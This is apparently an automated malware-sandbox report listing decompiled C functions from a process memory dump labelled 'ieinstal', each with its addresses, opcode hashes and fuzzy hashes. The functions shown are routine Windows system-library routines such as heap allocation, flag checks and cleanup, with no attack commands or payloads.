                        • Instruction Fuzzy Hash: 0811C232A106969BC700DF29CD94A5A77F6FF88215B020B29F94287690DB21EC55C7D1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED3002D, Relevance: .1, Instructions: 55COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E1ED3002D() {
				void* _t11;
				char* _t14;
				signed char* _t16;
				char* _t27;
				signed char* _t29;

				_t11 = E1ED27D50();
				_t27 = 0x7ffe0384;
				if(_t11 != 0) {
					_t14 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t14 = 0x7ffe0384;
				}
				_t29 = 0x7ffe0385;
				if( *_t14 != 0) {
					if(E1ED27D50() == 0) {
						_t16 = 0x7ffe0385;
					} else {
						_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t16 & 0x00000040) != 0) {
						goto L18;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(E1ED27D50() != 0) {
						_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					if( *_t27 != 0) {
						if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						if(E1ED27D50() != 0) {
							_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
						}
						if(( *_t29 & 0x00000020) == 0) {
							goto L5;
						}
						L18:
						return 1;
					} else {
						L5:
						return 0;
					}
				}
			}








                        0x1ed30032
                        0x1ed30037
                        0x1ed30043
                        0x1ed74b3a
                        0x1ed30049
                        0x1ed30049
                        0x1ed30049
                        0x1ed3004e
                        0x1ed30053
                        0x1ed74b48
                        0x1ed74b5a
                        0x1ed74b4a
                        0x1ed74b53
                        0x1ed74b53
                        0x1ed74b5f
                        0x00000000
                        0x1ed74b61
                        0x00000000
                        0x1ed74b61
                        0x1ed30059
                        0x1ed30059
                        0x1ed30060
                        0x1ed74b6f
                        0x1ed74b6f
                        0x1ed30069
                        0x1ed74b83
                        0x00000000
                        0x00000000
                        0x1ed74b90
                        0x1ed74b9b
                        0x1ed74b9b
                        0x1ed74ba4
                        0x00000000
                        0x00000000
                        0x1ed74baa
                        0x00000000
                        0x1ed3006f
                        0x1ed3006f
                        0x00000000
                        0x1ed3006f
                        0x1ed30069

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                        • Instruction ID: 075052272c6f3994caf746e681224d3d5d03c9f0c50db7d10c4a8bd2762aa5bf
                        • Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                        • Instruction Fuzzy Hash: A111ED72A166C2CFD3138B29C955B257BA6EB40B58F2A02B0DD44CB692E328DC41C360
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED1766D, Relevance: .1, Instructions: 54COMMON
                        Download Yara Rule
                        C-Code - Quality: 94%
                        			E1ED1766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				char _v8;
				void* _t22;
				void* _t24;
				intOrPtr _t29;
				intOrPtr* _t30;
				void* _t42;
				intOrPtr _t47;

				_push(__ecx);
				_t36 =  &_v8;
				if(E1ED3F3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
					L10:
					_t22 = 0;
				} else {
					_t24 = _v8 + __ecx;
					_t42 = _t24;
					if(_t24 < __ecx) {
						goto L10;
					} else {
						if(E1ED3F3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
							goto L10;
						} else {
							_t29 = _v8 + _t42;
							if(_t29 < _t42) {
								goto L10;
							} else {
								_t47 = _t29;
								_t30 = _a16;
								if(_t30 != 0) {
									 *_t30 = _t47;
								}
								if(_t47 == 0) {
									goto L10;
								} else {
									_t22 = L1ED24620(_t36,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47);
								}
							}
						}
					}
				}
				return _t22;
			}










                        0x1ed17672
                        0x1ed1767f
                        0x1ed17689
                        0x1ed176de
                        0x1ed176de
                        0x1ed1768b
                        0x1ed17691
                        0x1ed17693
                        0x1ed17697
                        0x00000000
                        0x1ed17699
                        0x1ed176a8
                        0x00000000
                        0x1ed176aa
                        0x1ed176ad
                        0x1ed176b1
                        0x00000000
                        0x1ed176b3
                        0x1ed176b3
                        0x1ed176b5
                        0x1ed176ba
                        0x1ed176bc
                        0x1ed176bc
                        0x1ed176c0
                        0x00000000
                        0x1ed176c2
                        0x1ed176ce
                        0x1ed176ce
                        0x1ed176c0
                        0x1ed176b1
                        0x1ed176a8
                        0x1ed17697
                        0x1ed176d9

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                        • Instruction ID: 61fc9c567b99eac111368003820e8f9ee86e08421fcfc5e495524b9e4e012b88
                        • Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                        • Instruction Fuzzy Hash: 2B018472701119ABD750CF5EDC51E9B77ADEF896A0B260764F948CF2A4DA30DD0187B0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED9C450, Relevance: .1, Instructions: 53COMMON
                        Download Yara Rule
                        C-Code - Quality: 46%
                        			E1ED9C450(intOrPtr* _a4) {
				signed char _t25;
				intOrPtr* _t26;
				intOrPtr* _t27;

				_t26 = _a4;
				_t25 =  *(_t26 + 0x10);
				if((_t25 & 0x00000003) != 1) {
					_push(0);
					_push(0);
					_push(0);
					_push( *((intOrPtr*)(_t26 + 8)));
					_push(0);
					_push( *_t26);
					E1ED49910();
					_t25 =  *(_t26 + 0x10);
				}
				if((_t25 & 0x00000001) != 0) {
					_push(4);
					_t7 = _t26 + 4; // 0x4
					_t27 = _t7;
					_push(_t27);
					_push(5);
					_push(0xfffffffe);
					E1ED495B0();
					if( *_t27 != 0) {
						_push( *_t27);
						E1ED495D0();
					}
				}
				_t8 = _t26 + 0x14; // 0x14
				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
					L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
				}
				_push( *_t26);
				E1ED495D0();
				return L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
			}






                        0x1ed9c458
                        0x1ed9c45d
                        0x1ed9c466
                        0x1ed9c468
                        0x1ed9c469
                        0x1ed9c46a
                        0x1ed9c46b
                        0x1ed9c46e
                        0x1ed9c46f
                        0x1ed9c471
                        0x1ed9c476
                        0x1ed9c476
                        0x1ed9c47c
                        0x1ed9c47e
                        0x1ed9c480
                        0x1ed9c480
                        0x1ed9c483
                        0x1ed9c484
                        0x1ed9c486
                        0x1ed9c488
                        0x1ed9c48f
                        0x1ed9c491
                        0x1ed9c493
                        0x1ed9c493
                        0x1ed9c48f
                        0x1ed9c498
                        0x1ed9c49e
                        0x1ed9c4ad
                        0x1ed9c4ad
                        0x1ed9c4b2
                        0x1ed9c4b4
                        0x1ed9c4cd

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                        • Instruction ID: cd5154b7e1703bbb482c5eb2f9cb3dece777abfd6bf88c5949e7ddebe7fdc9b8
                        • Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                        • Instruction Fuzzy Hash: F401C076240586BFDB119F25CC80E62B76EFB64790F214A25F104439A0CB21FCA0DAB0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED09080, Relevance: .1, Instructions: 53COMMON
                        Download Yara Rule
                        C-Code - Quality: 69%
                        			E1ED09080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
				intOrPtr* _t51;
				intOrPtr _t59;
				signed int _t64;
				signed int _t67;
				signed int* _t71;
				signed int _t74;
				signed int _t77;
				signed int _t82;
				intOrPtr* _t84;
				void* _t85;
				intOrPtr* _t87;
				void* _t94;
				signed int _t95;
				intOrPtr* _t97;
				signed int _t99;
				signed int _t102;
				void* _t104;

				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t97 = __ecx;
				_t102 =  *(__ecx + 0x14);
				if((_t102 & 0x02ffffff) == 0x2000000) {
					_t102 = _t102 | 0x000007d0;
				}
				_t48 =  *[fs:0x30];
				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
					_t102 = _t102 & 0xff000000;
				}
				_t80 = 0x1edf85ec;
				E1ED22280(_t48, 0x1edf85ec);
				_t51 =  *_t97 + 8;
				if( *_t51 != 0) {
					L6:
					return E1ED1FFB0(_t80, _t97, _t80);
				} else {
					 *(_t97 + 0x14) = _t102;
					_t84 =  *0x1edf538c; // 0x304fff8
					if( *_t84 != 0x1edf5388) {
						_t85 = 3;
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x2c);
						_push(0x1eddf6e8);
						E1ED5D0E8(0x1edf85ec, _t97, _t102);
						 *((char*)(_t104 - 0x1d)) = 0;
						_t99 =  *(_t104 + 8);
						__eflags = _t99;
						if(_t99 == 0) {
							L13:
							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
							if(__eflags == 0) {
								E1EDD88F5(_t80, _t85, 0x1edf5388, _t99, _t102, __eflags);
							}
						} else {
							__eflags = _t99 -  *0x1edf86c0; // 0x2fb07b0
							if(__eflags == 0) {
								goto L13;
							} else {
								__eflags = _t99 -  *0x1edf86b8; // 0x300f308
								if(__eflags == 0) {
									goto L13;
								} else {
									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
									__eflags =  *((char*)(_t59 + 0x28));
									if( *((char*)(_t59 + 0x28)) == 0) {
										E1ED22280(_t99 + 0xe0, _t99 + 0xe0);
										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
										__eflags =  *((char*)(_t99 + 0xe5));
										if(__eflags != 0) {
											E1EDD88F5(0x1edf85ec, _t85, 0x1edf5388, _t99, _t102, __eflags);
										} else {
											__eflags =  *((char*)(_t99 + 0xe4));
											if( *((char*)(_t99 + 0xe4)) == 0) {
												 *((char*)(_t99 + 0xe4)) = 1;
												_push(_t99);
												_push( *((intOrPtr*)(_t99 + 0x24)));
												E1ED4AFD0();
											}
											while(1) {
												_t71 = _t99 + 8;
												 *(_t104 - 0x2c) = _t71;
												_t80 =  *_t71;
												_t95 = _t71[1];
												 *(_t104 - 0x28) = _t80;
												 *(_t104 - 0x24) = _t95;
												while(1) {
													L19:
													__eflags = _t95;
													if(_t95 == 0) {
														break;
													}
													_t102 = _t80;
													 *(_t104 - 0x30) = _t95;
													 *(_t104 - 0x24) = _t95 - 1;
													asm("lock cmpxchg8b [edi]");
													_t80 = _t102;
													 *(_t104 - 0x28) = _t80;
													 *(_t104 - 0x24) = _t95;
													__eflags = _t80 - _t102;
													_t99 =  *(_t104 + 8);
													if(_t80 != _t102) {
														continue;
													} else {
														__eflags = _t95 -  *(_t104 - 0x30);
														if(_t95 !=  *(_t104 - 0x30)) {
															continue;
														} else {
															__eflags = _t95;
															if(_t95 != 0) {
																_t74 = 0;
																 *(_t104 - 0x34) = 0;
																_t102 = 0;
																__eflags = 0;
																while(1) {
																	 *(_t104 - 0x3c) = _t102;
																	__eflags = _t102 - 3;
																	if(_t102 >= 3) {
																		break;
																	}
																	__eflags = _t74;
																	if(_t74 != 0) {
																		L49:
																		_t102 =  *_t74;
																		__eflags = _t102;
																		if(_t102 != 0) {
																			_t102 =  *(_t102 + 4);
																			__eflags = _t102;
																			if(_t102 != 0) {
																				 *0x1edfb1e0(_t74, _t99);
																				 *_t102();
																			}
																		}
																		do {
																			_t71 = _t99 + 8;
																			 *(_t104 - 0x2c) = _t71;
																			_t80 =  *_t71;
																			_t95 = _t71[1];
																			 *(_t104 - 0x28) = _t80;
																			 *(_t104 - 0x24) = _t95;
																			goto L19;
																		} while (_t74 == 0);
																		goto L49;
																	} else {
																		_t82 = 0;
																		__eflags = 0;
																		while(1) {
																			 *(_t104 - 0x38) = _t82;
																			__eflags = _t82 -  *0x1edf84c0;
																			if(_t82 >=  *0x1edf84c0) {
																				break;
																			}
																			__eflags = _t74;
																			if(_t74 == 0) {
																				_t77 = E1EDD9063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
																				__eflags = _t77;
																				if(_t77 == 0) {
																					_t74 = 0;
																					__eflags = 0;
																				} else {
																					_t74 = _t77 + 0xfffffff4;
																				}
																				 *(_t104 - 0x34) = _t74;
																				_t82 = _t82 + 1;
																				continue;
																			}
																			break;
																		}
																		_t102 = _t102 + 1;
																		continue;
																	}
																	goto L20;
																}
																__eflags = _t74;
															}
														}
													}
													break;
												}
												L20:
												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
												 *((char*)(_t99 + 0xe5)) = 1;
												 *((char*)(_t104 - 0x1d)) = 1;
												goto L21;
											}
										}
										L21:
										 *(_t104 - 4) = 0xfffffffe;
										E1ED0922A(_t99);
										_t64 = E1ED27D50();
										__eflags = _t64;
										if(_t64 != 0) {
											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
										} else {
											_t67 = 0x7ffe0386;
										}
										__eflags =  *_t67;
										if( *_t67 != 0) {
											_t67 = E1EDD8B58(_t99);
										}
										__eflags =  *((char*)(_t104 - 0x1d));
										if( *((char*)(_t104 - 0x1d)) != 0) {
											__eflags = _t99 -  *0x1edf86c0; // 0x2fb07b0
											if(__eflags != 0) {
												__eflags = _t99 -  *0x1edf86b8; // 0x300f308
												if(__eflags == 0) {
													_t94 = 0x1edf86bc;
													_t87 = 0x1edf86b8;
													goto L27;
												} else {
													__eflags = _t67 | 0xffffffff;
													asm("lock xadd [edi], eax");
													if(__eflags == 0) {
														E1ED09240(_t80, _t99, _t99, _t102, __eflags);
													}
												}
											} else {
												_t94 = 0x1edf86c4;
												_t87 = 0x1edf86c0;
												L27:
												E1ED39B82(_t80, _t87, _t94, _t99, _t102, __eflags);
											}
										}
									} else {
										goto L13;
									}
								}
							}
						}
						return E1ED5D130(_t80, _t99, _t102);
					} else {
						 *_t51 = 0x1edf5388;
						 *((intOrPtr*)(_t51 + 4)) = _t84;
						 *_t84 = _t51;
						 *0x1edf538c = _t51;
						goto L6;
					}
				}
			}




















                        0x1ed09082
                        0x1ed09083
                        0x1ed09084
                        0x1ed09085
                        0x1ed09087
                        0x1ed09096
                        0x1ed09098
                        0x1ed09098
                        0x1ed0909e
                        0x1ed090a8
                        0x1ed090e7
                        0x1ed090e7
                        0x1ed090aa
                        0x1ed090b0
                        0x1ed090b7
                        0x1ed090bd
                        0x1ed090dd
                        0x1ed090e6
                        0x1ed090bf
                        0x1ed090bf
                        0x1ed090c7
                        0x1ed090cf
                        0x1ed090f1
                        0x1ed090f2
                        0x1ed090f4
                        0x1ed090f5
                        0x1ed090f6
                        0x1ed090f7
                        0x1ed090f8
                        0x1ed090f9
                        0x1ed090fa
                        0x1ed090fb
                        0x1ed090fc
                        0x1ed090fd
                        0x1ed090fe
                        0x1ed090ff
                        0x1ed09100
                        0x1ed09102
                        0x1ed09107
                        0x1ed0910c
                        0x1ed09110
                        0x1ed09113
                        0x1ed09115
                        0x1ed09136
                        0x1ed0913f
                        0x1ed09143
                        0x1ed637e4
                        0x1ed637e4
                        0x1ed09117
                        0x1ed09117
                        0x1ed0911d
                        0x00000000
                        0x1ed0911f
                        0x1ed0911f
                        0x1ed09125
                        0x00000000
                        0x1ed09127
                        0x1ed0912d
                        0x1ed09130
                        0x1ed09134
                        0x1ed09158
                        0x1ed0915d
                        0x1ed09161
                        0x1ed09168
                        0x1ed63715
                        0x1ed0916e
                        0x1ed0916e
                        0x1ed09175
                        0x1ed09177
                        0x1ed0917e
                        0x1ed0917f
                        0x1ed09182
                        0x1ed09182
                        0x1ed09187
                        0x1ed09187
                        0x1ed0918a
                        0x1ed0918d
                        0x1ed0918f
                        0x1ed09192
                        0x1ed09195
                        0x1ed09198
                        0x1ed09198
                        0x1ed09198
                        0x1ed0919a
                        0x00000000
                        0x00000000
                        0x1ed6371f
                        0x1ed63721
                        0x1ed63727
                        0x1ed6372f
                        0x1ed63733
                        0x1ed63735
                        0x1ed63738
                        0x1ed6373b
                        0x1ed6373d
                        0x1ed63740
                        0x00000000
                        0x1ed63746
                        0x1ed63746
                        0x1ed63749
                        0x00000000
                        0x1ed6374f
                        0x1ed6374f
                        0x1ed63751
                        0x1ed63757
                        0x1ed63759
                        0x1ed6375c
                        0x1ed6375c
                        0x1ed6375e
                        0x1ed6375e
                        0x1ed63761
                        0x1ed63764
                        0x00000000
                        0x00000000
                        0x1ed63766
                        0x1ed63768
                        0x1ed637a3
                        0x1ed637a3
                        0x1ed637a5
                        0x1ed637a7
                        0x1ed637ad
                        0x1ed637b0
                        0x1ed637b2
                        0x1ed637bc
                        0x1ed637c2
                        0x1ed637c2
                        0x1ed637b2
                        0x1ed09187
                        0x1ed09187
                        0x1ed0918a
                        0x1ed0918d
                        0x1ed0918f
                        0x1ed09192
                        0x1ed09195
                        0x00000000
                        0x1ed09195
                        0x00000000
                        0x1ed6376a
                        0x1ed6376a
                        0x1ed6376a
                        0x1ed6376c
                        0x1ed6376c
                        0x1ed6376f
                        0x1ed63775
                        0x00000000
                        0x00000000
                        0x1ed63777
                        0x1ed63779
                        0x1ed63782
                        0x1ed63787
                        0x1ed63789
                        0x1ed63790
                        0x1ed63790
                        0x1ed6378b
                        0x1ed6378b
                        0x1ed6378b
                        0x1ed63792
                        0x1ed63795
                        0x00000000
                        0x1ed63795
                        0x00000000
                        0x1ed63779
                        0x1ed63798
                        0x00000000
                        0x1ed63798
                        0x00000000
                        0x1ed63768
                        0x1ed6379b
                        0x1ed6379b
                        0x1ed63751
                        0x1ed63749
                        0x00000000
                        0x1ed63740
                        0x1ed091a0
                        0x1ed091a3
                        0x1ed091a9
                        0x1ed091b0
                        0x00000000
                        0x1ed091b0
                        0x1ed09187
                        0x1ed091b4
                        0x1ed091b4
                        0x1ed091bb
                        0x1ed091c0
                        0x1ed091c5
                        0x1ed091c7
                        0x1ed637da
                        0x1ed091cd
                        0x1ed091cd
                        0x1ed091cd
                        0x1ed091d2
                        0x1ed091d5
                        0x1ed09239
                        0x1ed09239
                        0x1ed091d7
                        0x1ed091db
                        0x1ed091e1
                        0x1ed091e7
                        0x1ed091fd
                        0x1ed09203
                        0x1ed0921e
                        0x1ed09223
                        0x00000000
                        0x1ed09205
                        0x1ed09205
                        0x1ed09208
                        0x1ed0920c
                        0x1ed09214
                        0x1ed09214
                        0x1ed0920c
                        0x1ed091e9
                        0x1ed091e9
                        0x1ed091ee
                        0x1ed091f3
                        0x1ed091f3
                        0x1ed091f3
                        0x1ed091e7
                        0x00000000
                        0x00000000
                        0x00000000
                        0x1ed09134
                        0x1ed09125
                        0x1ed0911d
                        0x1ed0914e
                        0x1ed090d1
                        0x1ed090d1
                        0x1ed090d3
                        0x1ed090d6
                        0x1ed090d8
                        0x00000000
                        0x1ed090d8
                        0x1ed090cf

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5e31dae117d83b5c2b6bd4c8ec8ff71d55964b31693610454e2b8433cf3c982a
                        • Instruction ID: 3e674d8b609499c03d2b435e200fe85003ec5b2a25d2269c2b826bfeed88fc4f
                        • Opcode Fuzzy Hash: 5e31dae117d83b5c2b6bd4c8ec8ff71d55964b31693610454e2b8433cf3c982a
                        • Instruction Fuzzy Hash: 3C01F472A11251CFC304CF19D840B05B7EAEF81721F2A8266E1058B391C770DD42CBA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1EDD4015, Relevance: .0, Instructions: 49COMMON
                        Download Yara Rule
                        C-Code - Quality: 86%
                        			E1EDD4015(signed int __eax, signed int __ecx) {
				void* __ebx;
				void* __edi;
				signed char _t10;
				signed int _t28;

				_push(__ecx);
				_t28 = __ecx;
				asm("lock xadd [edi+0x24], eax");
				_t10 = (__eax | 0xffffffff) - 1;
				if(_t10 == 0) {
					_t1 = _t28 + 0x1c; // 0x1e
					E1ED22280(_t10, _t1);
					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
					E1ED22280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x1edf86ac);
					E1ED0F900(0x1edf86d4, _t28);
					E1ED1FFB0(0x1edf86ac, _t28, 0x1edf86ac);
					 *((intOrPtr*)(_t28 + 0x20)) = 0;
					E1ED1FFB0(0, _t28, _t1);
					_t18 =  *((intOrPtr*)(_t28 + 0x94));
					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
						L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
					}
					_t10 = L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
				}
				return _t10;
			}







                        0x1edd401a
                        0x1edd401e
                        0x1edd4023
                        0x1edd4028
                        0x1edd4029
                        0x1edd402b
                        0x1edd402f
                        0x1edd4043
                        0x1edd4046
                        0x1edd4051
                        0x1edd4057
                        0x1edd405f
                        0x1edd4062
                        0x1edd4067
                        0x1edd406f
                        0x1edd407c
                        0x1edd407c
                        0x1edd408c
                        0x1edd408c
                        0x1edd4097

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c6a0da8b50a2885c5809f29ed2902d120b4c50fbdbf9b057d3c22c15b5489afa
                        • Instruction ID: 5b62f431f67509d91b6bf547c92bb8082634a2cc45be910b857f36f3908eff9d
                        • Opcode Fuzzy Hash: c6a0da8b50a2885c5809f29ed2902d120b4c50fbdbf9b057d3c22c15b5489afa
                        • Instruction Fuzzy Hash: DB01DF76201A86BFC2109B69DE80E57B7ACFF49664B010725B10887A91CB24FC51C6F1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1EDC14FB, Relevance: .0, Instructions: 48COMMON
                        Download Yara Rule
                        C-Code - Quality: 61%
                        			E1EDC14FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x1edfd360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E1ED4FA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1034;
				if(E1ED27D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E1ED4B640(E1ED49AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

















                        0x1edc14fb
                        0x1edc14fb
                        0x1edc150a
                        0x1edc1514
                        0x1edc1519
                        0x1edc151b
                        0x1edc1526
                        0x1edc152c
                        0x1edc1534
                        0x1edc1537
                        0x1edc153a
                        0x1edc1545
                        0x1edc1557
                        0x1edc1547
                        0x1edc1550
                        0x1edc1550
                        0x1edc1562
                        0x1edc1563
                        0x1edc1565
                        0x1edc156a
                        0x1edc157f

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0a2d529bf258dd71c6ea70a44dbd72f78a00e8de3e4f47ff2ef2ff8f2efb6a9f
                        • Instruction ID: ca5fe087f1b42c7356e99b77bd922ade2bf1d92a7114751b4036908bf9119858
                        • Opcode Fuzzy Hash: 0a2d529bf258dd71c6ea70a44dbd72f78a00e8de3e4f47ff2ef2ff8f2efb6a9f
                        • Instruction Fuzzy Hash: C6019275A00258AFCB00DF69C846FAEB7F8EF44700F50416AF915EB280DB70EA01CB94
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1EDC138A, Relevance: .0, Instructions: 48COMMON
                        Download Yara Rule
                        C-Code - Quality: 61%
                        			E1EDC138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x1edfd360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E1ED4FA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1033;
				if(E1ED27D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E1ED4B640(E1ED49AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

















                        0x1edc138a
                        0x1edc138a
                        0x1edc1399
                        0x1edc13a3
                        0x1edc13a8
                        0x1edc13aa
                        0x1edc13b5
                        0x1edc13bb
                        0x1edc13c3
                        0x1edc13c6
                        0x1edc13c9
                        0x1edc13d4
                        0x1edc13e6
                        0x1edc13d6
                        0x1edc13df
                        0x1edc13df
                        0x1edc13f1
                        0x1edc13f2
                        0x1edc13f4
                        0x1edc13f9
                        0x1edc140e

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 11b1ada25a8af7f3838293af6606e4efbcab479b04acbb8a418b075245430f13
                        • Instruction ID: f70d3c50b90c94541da3d6218a83d689329d9f1a7e67abfd5f9e7b49dadf4f9f
                        • Opcode Fuzzy Hash: 11b1ada25a8af7f3838293af6606e4efbcab479b04acbb8a418b075245430f13
                        • Instruction Fuzzy Hash: 64019275A00258AFCB00DFA9C842FAEB7F8EF44700F50416AF900EB680DB70EA01C794
                        Uniqueness

                        Uniqueness Score: -1.00%

